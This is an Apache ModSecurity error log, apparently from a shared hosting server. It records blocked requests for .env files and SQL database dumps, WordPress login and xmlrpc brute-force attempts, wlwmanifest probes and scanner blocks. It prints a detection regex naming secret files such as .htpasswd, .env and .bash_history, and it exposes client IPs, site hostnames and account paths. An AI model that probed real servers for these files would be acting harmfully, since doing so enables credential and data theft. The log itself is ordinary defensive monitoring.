[Tue May 26 13:42:42.229440 2026] [security2:error] [pid 544395:tid 544427] [remote 74.7.241.58:53410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVV-hmrs7g3RMCdp8XXfQAAZB8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 13:42:43.729732 2026] [security2:error] [pid 544395:tid 544644] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV-xmrs7g3RMCdp8XXlgAAAHc"]
[Tue May 26 13:42:44.409324 2026] [security2:error] [pid 544395:tid 544561] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVV-xmrs7g3RMCdp8XXkAAAACQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:42:45.488796 2026] [security2:error] [pid 544395:tid 544526] [client 123.28.177.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXtAAAAAE"]
[Tue May 26 13:42:45.528558 2026] [security2:error] [pid 544395:tid 544627] [client 14.183.182.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php/2016/02/10/reverse-engineering-an-existing-database-using-the-hibernate-maven-plug-in/"] [unique_id "ahVV_Bmrs7g3RMCdp8XXnwAAAGY"]
[Tue May 26 13:42:45.528990 2026] [security2:error] [pid 536875:tid 537092] [client 14.183.182.215:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php/2016/02/10/reverse-engineering-an-existing-database-using-the-hibernate-maven-plug-in/"] [unique_id "ahVV--r_-FTveSGlx1H0KgAAANw"]
[Tue May 26 13:42:45.795517 2026] [security2:error] [pid 544395:tid 544565] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXvwAAACg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 13:42:46.012952 2026] [security2:error] [pid 544395:tid 544531] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_Rmrs7g3RMCdp8XXvQAAAAY"]
[Tue May 26 13:42:46.347757 2026] [security2:error] [pid 544395:tid 544460] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/database.sql"] [unique_id "ahVV_hmrs7g3RMCdp8XX1AAAXEA"]
[Tue May 26 13:42:46.485039 2026] [security2:error] [pid 544395:tid 544540] [client 176.65.139.238:41516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.quickdeliveryexp.com"] [uri "/.env"] [unique_id "ahVV_hmrs7g3RMCdp8XX2AAAAA8"]
[Tue May 26 13:42:46.635017 2026] [security2:error] [pid 544395:tid 544464] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/dump.sql"] [unique_id "ahVV_hmrs7g3RMCdp8XX2QAAHkQ"]
[Tue May 26 13:42:47.299756 2026] [security2:error] [pid 544395:tid 544465] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/backup.sql"] [unique_id "ahVV_xmrs7g3RMCdp8XX7QAAAEU"]
[Tue May 26 13:42:47.770930 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV_-r_-FTveSGlx1H0SwAAAOs"]
[Tue May 26 13:42:47.806985 2026] [security2:error] [pid 544395:tid 544504] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/db.sql"] [unique_id "ahVV_xmrs7g3RMCdp8XX8QAATGw"]
[Tue May 26 13:42:48.189110 2026] [security2:error] [pid 536875:tid 537101] [client 129.222.147.134:57154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWAOr_-FTveSGlx1H0WAAAAOU"]
[Tue May 26 13:42:48.192555 2026] [security2:error] [pid 536875:tid 537101] [client 129.222.147.134:57154] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWAOr_-FTveSGlx1H0WAAAAOU"]
[Tue May 26 13:42:48.846056 2026] [security2:error] [pid 544395:tid 544594] [client 3.237.65.43:59486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/images/images/cache.php"] [unique_id "ahVWABmrs7g3RMCdp8XYAgAAAEU"], referer: www.google.com
[Tue May 26 13:42:48.953888 2026] [security2:error] [pid 536875:tid 537020] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWAOr_-FTveSGlx1H0XgAAAJQ"]
[Tue May 26 13:42:50.108929 2026] [security2:error] [pid 544395:tid 544621] [client 106.192.248.115:51577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYGAAAAGA"]
[Tue May 26 13:42:50.109071 2026] [security2:error] [pid 544395:tid 544621] [client 106.192.248.115:51577] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYGAAAAGA"]
[Tue May 26 13:42:50.168098 2026] [security2:error] [pid 544395:tid 544480] [remote 88.198.91.116:44956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVWARmrs7g3RMCdp8XYFQAACFQ"]
[Tue May 26 13:42:50.642918 2026] [security2:error] [pid 536875:tid 537070] [client 89.221.204.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVWAur_-FTveSGlx1H0bwAAAMY"], referer: https://anujtradingco.com
[Tue May 26 13:42:50.997348 2026] [security2:error] [pid 544395:tid 544589] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWAhmrs7g3RMCdp8XYIwAAAEA"]
[Tue May 26 13:42:52.165600 2026] [security2:error] [pid 544395:tid 544476] [remote 95.216.117.13:44390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVWAxmrs7g3RMCdp8XYMgAATFA"]
[Tue May 26 13:42:53.608698 2026] [security2:error] [pid 536875:tid 537042] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWBer_-FTveSGlx1H0lgAAAKo"]
[Tue May 26 13:42:54.392295 2026] [security2:error] [pid 544395:tid 544479] [remote 88.198.91.116:60732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVWBhmrs7g3RMCdp8XYWgAAYFM"]
[Tue May 26 13:42:54.845849 2026] [security2:error] [pid 536875:tid 537072] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWBur_-FTveSGlx1H0swAAAMg"]
[Tue May 26 13:42:57.140230 2026] [security2:error] [pid 536875:tid 536952] [remote 45.136.17.84:48580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.17.136.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVWCOr_-FTveSGlx1H03wAA3Uw"]
[Tue May 26 13:42:57.211359 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWCOr_-FTveSGlx1H02wAAANQ"]
[Tue May 26 13:42:58.324721 2026] [security2:error] [pid 544395:tid 544576] [client 114.119.143.104:36729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/robots.txt"] [unique_id "ahVWChmrs7g3RMCdp8XYiwAAADM"]
[Tue May 26 13:42:58.587666 2026] [security2:error] [pid 544395:tid 544622] [client 129.222.147.134:9219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWChmrs7g3RMCdp8XYjQAAAGE"]
[Tue May 26 13:42:58.587870 2026] [security2:error] [pid 544395:tid 544622] [client 129.222.147.134:9219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWChmrs7g3RMCdp8XYjQAAAGE"]
[Tue May 26 13:42:59.525202 2026] [autoindex:error] [pid 536875:tid 537050] [client 101.33.81.73:53086] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:42:59.683333 2026] [security2:error] [pid 536875:tid 537019] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWC-r_-FTveSGlx1H0_wAAAJM"]
[Tue May 26 13:43:00.583586 2026] [security2:error] [pid 544395:tid 544529] [client 106.192.248.115:51891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWDBmrs7g3RMCdp8XYrAAAAAQ"]
[Tue May 26 13:43:00.588864 2026] [security2:error] [pid 544395:tid 544529] [client 106.192.248.115:51891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWDBmrs7g3RMCdp8XYrAAAAAQ"]
[Tue May 26 13:43:01.352371 2026] [security2:error] [pid 536875:tid 537008] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWDOr_-FTveSGlx1H1IAAAAIg"]
[Tue May 26 13:43:02.187846 2026] [security2:error] [pid 544395:tid 544568] [client 66.249.66.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVWDRmrs7g3RMCdp8XYyQAAACs"]
[Tue May 26 13:43:03.301530 2026] [security2:error] [pid 544395:tid 544645] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWDhmrs7g3RMCdp8XY2gAAAHg"]
[Tue May 26 13:43:05.156350 2026] [security2:error] [pid 536875:tid 537067] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWEOr_-FTveSGlx1H1PQAAAMM"]
[Tue May 26 13:43:06.570801 2026] [security2:error] [pid 544395:tid 544582] [client 136.243.228.198:42405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/products.php"] [unique_id "ahVWEhmrs7g3RMCdp8XZCwAAADk"]
[Tue May 26 13:43:08.407869 2026] [security2:error] [pid 536875:tid 537025] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWE-r_-FTveSGlx1H1iAAAAJk"]
[Tue May 26 13:43:08.449809 2026] [security2:error] [pid 544395:tid 544575] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFBmrs7g3RMCdp8XZJwAAADI"]
[Tue May 26 13:43:08.720432 2026] [security2:error] [pid 536875:tid 537092] [client 129.222.147.134:65486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWFOr_-FTveSGlx1H1lgAAANw"]
[Tue May 26 13:43:08.720548 2026] [security2:error] [pid 536875:tid 537092] [client 129.222.147.134:65486] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWFOr_-FTveSGlx1H1lgAAANw"]
[Tue May 26 13:43:09.504639 2026] [security2:error] [pid 544395:tid 544624] [client 186.130.158.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFRmrs7g3RMCdp8XZPwAAAGM"]
[Tue May 26 13:43:09.865346 2026] [security2:error] [pid 544395:tid 544507] [remote 46.62.185.67:50620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVWFRmrs7g3RMCdp8XZRwAALm8"]
[Tue May 26 13:43:10.645769 2026] [security2:error] [pid 544395:tid 544603] [client 136.243.228.198:19980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/index.php"] [unique_id "ahVWFhmrs7g3RMCdp8XZWgAAAE4"]
[Tue May 26 13:43:10.801940 2026] [security2:error] [pid 544395:tid 544529] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWFhmrs7g3RMCdp8XZVwAAAAQ"]
[Tue May 26 13:43:11.141770 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:52199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWFxmrs7g3RMCdp8XZZgAAAEI"]
[Tue May 26 13:43:11.142576 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:52199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWFxmrs7g3RMCdp8XZZgAAAEI"]
[Tue May 26 13:43:11.591255 2026] [core:crit] [pid 544395:tid 544552] (13)Permission denied: [client 52.167.144.222:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:12.965654 2026] [security2:error] [pid 536875:tid 537067] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWGOr_-FTveSGlx1H1wQAAAMM"]
[Tue May 26 13:43:13.447502 2026] [security2:error] [pid 544395:tid 544646] [client 34.75.119.88:53250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.119.75.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rabbanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVWGRmrs7g3RMCdp8XZjwAAAHk"]
[Tue May 26 13:43:13.743862 2026] [security2:error] [pid 544395:tid 544610] [client 34.75.119.88:64046] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGRmrs7g3RMCdp8XZlwAAAFU"]
[Tue May 26 13:43:14.037948 2026] [security2:error] [pid 536875:tid 537006] [client 34.75.119.88:59602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H10gAAAIY"]
[Tue May 26 13:43:14.245562 2026] [security2:error] [pid 544395:tid 544549] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWGRmrs7g3RMCdp8XZmQAAABg"]
[Tue May 26 13:43:14.384837 2026] [security2:error] [pid 536875:tid 537073] [client 34.75.119.88:53489] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H11gAAAMk"]
[Tue May 26 13:43:14.687308 2026] [security2:error] [pid 544395:tid 544650] [client 34.75.119.88:57300] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGhmrs7g3RMCdp8XZqQAAAH0"]
[Tue May 26 13:43:14.963008 2026] [security2:error] [pid 536875:tid 537070] [client 136.243.228.198:34625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.228.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/about.php"] [unique_id "ahVWGur_-FTveSGlx1H14AAAAMY"]
[Tue May 26 13:43:14.987348 2026] [security2:error] [pid 536875:tid 537112] [client 34.75.119.88:51842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVWGur_-FTveSGlx1H14QAAAPA"]
[Tue May 26 13:43:15.283743 2026] [core:crit] [pid 536875:tid 537085] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:43:15.299282 2026] [security2:error] [pid 536875:tid 537126] [client 34.75.119.88:58438] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rabbanitradingcompany.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVWG-r_-FTveSGlx1H16AAAAP4"]
